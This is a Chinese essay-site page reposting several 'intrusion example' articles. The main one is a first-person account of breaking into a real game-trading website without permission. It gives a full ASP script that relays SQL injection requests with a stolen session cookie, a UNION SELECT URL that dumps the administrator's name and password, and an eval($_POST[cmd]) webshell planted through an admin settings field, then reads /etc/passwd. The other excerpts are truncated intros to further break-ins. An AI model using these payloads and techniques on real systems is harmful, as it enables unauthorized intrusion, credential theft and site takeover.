欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>实例入侵一游戏交易网

实例入侵一游戏交易网

2023-01-11 08:32:52 收藏本文 下载本文

“剩一个勺也半了”通过精心收集,向本站投稿了6篇实例入侵一游戏交易网,下面是小编整理后的实例入侵一游戏交易网,欢迎阅读分享,希望对大家有所帮助。

实例入侵一游戏交易网

篇1:实例入侵一游戏交易网

在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程

一: 踩点 收集信息

因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握

服务器上13个站点,大多数站点很安全,因为第一渗透的时候,是由

www.shanXXX.XX  这个站进入的

我这个人比较恋旧,所以第二次也决定由这个站点进行入侵,

由后台看出这个站的程序是RAICO_V1[1].2_CS

直接从网上down下来,读代码,当然这里的php代码 本人是非常的菜鸟,感谢我的好友jackal,他的脚本是相当的强悍,呵呵

二: 漏洞在哪里?它在灯火阑珊处

这个程序的漏洞文件是在post_task_review.php

由于过滤不严格导致注入,下面我会在文章中详细说明如何利用,

首先在shan这个站注册个用户 并抓取登陆的cookie值,在到本地或者webshell上建立一个注入中转站的文件

内容如下

<%

JmdcwName=request(“id”)

' 注入中转站 POST 版,BY 寂寞的刺猬 [L.S.T]

JmStr=“task_subject=111&task_endday=1&task_starttime=-06-13+05%3A25%3A30&task_money=1&task_desc=1&addsubmit=%D4%A4%C0%C0&kind_id=”&JmdcwName

JMUrl=“www.shanXXX.XX/post_task_review.php”

JmRef=“www.shanXXX.XX/post_task.php”

JmCok=“__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; PHPSESSID=96b20d4edfe8477cf276aa639bfc31d3”

JmStr=URLEncoding(JmStr)

response.write  PostData(JMUrl,JmStr,JmCok,JmRef)

Function PostData(PostUrl,PostStr,PostCok,PostRef)

Dim Http

Set Http = Server.CreateObject(“msxml2.serverXMLHTTP”)

With Http

.Open “POST”,PostUrl,False

.SetRequestHeader “Content-Length”,Len(PostStr)

.SetRequestHeader “Content-Type”,“application/x-www-form-urlencoded”

.SetRequestHeader “Referer”,PostRef

.SetRequestHeader “Cookie”,PostCok

.Send PostStr

PostData = .ResponseBody

End With

Set Http = Nothing

PostData =bytes2BSTR(PostData)

End Function

Function bytes2BSTR(vIn)

Dim strReturn

Dim I, ThisCharCode, NextCharCode

strReturn = “”

For I = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn, I, 1))

If ThisCharCode < &H80 Then

strReturn = strReturn & Chr(ThisCharCode)

Else

NextCharCode = AscB(MidB(vIn, I + 1, 1))

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

I = I + 1

End If

Next

bytes2BSTR = strReturn

End Function

Function URLEncoding(vstrin)

strReturn=“”

Dim i

For i=1 To Len(vstrin)

ThisChr=Mid(vstrin,i,1)

if Abs(Asc(ThisChr))< &HFF Then

strReturn=strReturn & ThisChr

Else

InnerCode=Asc(ThisChr)

If InnerCode<0 Then

InnerCode=InnerCode + &H10000

End If

Hight1=(InnerCode And &HFF00) \&HFF

Low1=InnerCode And &HFF

strReturn=strReturn & “%” & Hex(Hight1) & “%” & Hex(Low1)

End if

Next

strReturn=Replace(strReturn,chr(32),“%20”) '转换空格,如果网站过滤了空格,尝试用/**/来代替%20

strReturn=Replace(strReturn,chr(43),“%2B”)  'JMDCW增加转换+字符

'strReturn=Replace(strReturn,过滤字符,“转换为字符”)  '在此增加要过滤的代码

URLEncoding=strReturn

End Function

%>

之后浏览地址为localhost/jmpost.asp?id=1107%20and%201=2%20union%20select%20-1,concat(admin_name,admin_pw)%20from%20rco_admin/* 就可以直接爆出管理员的用户名和密码 如图2[attach]3281[/attach]

三: 获取webshell  拿到目标站的路径.

登陆后台

,只能上传图片,抓包上传,截断 ,未能实现.

但是后台的配置那可以插一句话

a'“;@eval($_POST[cmd]);//

写进去本来是site=”a\'“;@eval”

但是过滤了'

就成了site=“a”;@eval;//“

这样成功的闭合了前面的双引,把后面的双引注释掉了.中间的;@eval($_POST[cmd]);就可以执行了.

把a'”;@eval($_POST[cmd]);// 写进去就保存到一个文件里了.

这个文件被所有的文件包含.

所以我们直接同一句话连接端连接网站的任何一个文件都可以获得webshell.

直接传php没传上去,所以把php马改成jpg格式的,之后在一句话连接端中修改成php的

顺利拿到webshell,linux的服务器

执行 cat /etc/password 获得目标站的路径,如图6[attach]3285[/attach]

直接跳转到目标站的目录, 全是0644,尝试过提权 但是反弹不了,后来才知道是服务器连不上网.

搞到这里,应该是大功告成了,传马,ok!

四:意外情况,不是意外收获.

上传木马成功,惊喜之余,去访问shell地址,

错误 Not Found.

经验告诉我,可能是换了服务器,因为这样的游戏站基本上都是变态,被搞一次,安全性就加大N倍,很黄,很强大.

篇2:0day交易网成功入侵事件

1:扫描Exploithub.com网站

2:发现blog WordPress 缺失wp-config.php www.exploithub.com/blog/ –》重新安装了该blog

3:上传shell级的phpinfo

4:备份所有文件和数据库,并且进行下载操作

篇3:20CN.ORG入侵实例

|=-------再现善意侵入20CN.ORG全过程-------=| |=---------=[ PsKey EnvyMask ]=---------=| |=-------------------------------------------------=| Dedicated This Scrap To CaoJing TaoZi 武学之中, 出其不意、剑走偏锋才能发挥灵巧之长,

20CN.ORG入侵实例

在防火墙广泛

篇4:灰色轨迹入侵实例

灰色轨迹是一个人气很不错的 技术站点,所以就想测试一下php脚本的安全性,

灰色轨迹入侵实例

因为是由于灰色论坛启发的学习之路,所以偶得先看看灰色论坛用得是版本的vbb了DDDvBulletin Forum 2.3.0。 -------- 相关代码如下 ---------- else if ($action == edit) { $

篇5:入侵收费网站实例

I、前言 经过这几年网络泡沫的洗礼,各大网站也慢慢地成长起来了,

入侵收费网站实例

人们也渐渐地懂得了一个道理,天下没有免费的午餐,所以,网络上免费的东西越来越少。收费邮箱、收费空间、收费域名等等各种各样的服务也都明码标价,甚至看个电影,下载个软件,也变成了付

篇6:网络入侵详解(网络入侵实例)

入侵一个系统有很多步骤,阶段性很强的工作,其最终的目标是获得超级用户权限对目标系统的绝对控制,

网络入侵详解(网络入侵实例)

从对该系统一无所知开始,我们利用其提供的各种网络服务收集关于它的信息,这些信息暴露出系统的安全脆弱性或潜在入口;然后我们利用这些网络服务固有的或

【实例入侵一游戏交易网】相关文章:

1.入侵检测

2.一起来游戏作文

3.海葵入侵作文

4.天平游戏一教学反思

5.网络语言的入侵

6.Hadoop作业性能指标及参数调优实例(一)Hadoop作业

7.《亲一亲》小班语言游戏教案

8.如火如荼造句实例

9.头头是道造句实例

10.桃花源记教案实例

下载word文档
《实例入侵一游戏交易网.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

  • 返回顶部